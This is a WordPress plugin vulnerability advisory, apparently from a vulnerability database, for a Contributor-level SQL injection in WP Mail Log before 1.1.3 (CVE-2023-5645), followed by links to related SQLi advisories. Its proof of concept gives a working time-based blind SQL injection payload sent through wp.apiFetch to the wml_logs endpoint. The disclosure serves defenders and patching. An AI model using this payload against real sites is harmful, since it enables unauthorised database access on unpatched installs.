WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint | CVE 2023-5645 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor.

Proof of Concept

Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the injected SQL.

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10, filter: {1: {key: '1=(SELECT IF(1=1,SLEEP(10),\'a\')))#', operator: '', value: ''}}}});

Affects Plugins

Fixed in 1.1.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

e392fb53-66e9-4c43-9e4f-f4ea7c561551

Timeline

Publicly Published

2023-11-28 (about 5 months ago)

Added

2023-11-28 (about 5 months ago)

Last Updated

2023-11-28 (about 5 months ago)

Other

Published

Title

Published

2024-02-27

Title

WP eCommerce <= 3.15.1 - Unauthenticated SQL Injection

Published

2014-12-03

Title

Google Document Embedder <= 2.5.16 - SQL Injection

Published

2021-11-09

Title

LearnPress < 4.1.4 - Admin+ SQL Injection

Published

2023-07-17

Title

MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi

Published

2020-11-20

Title

Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections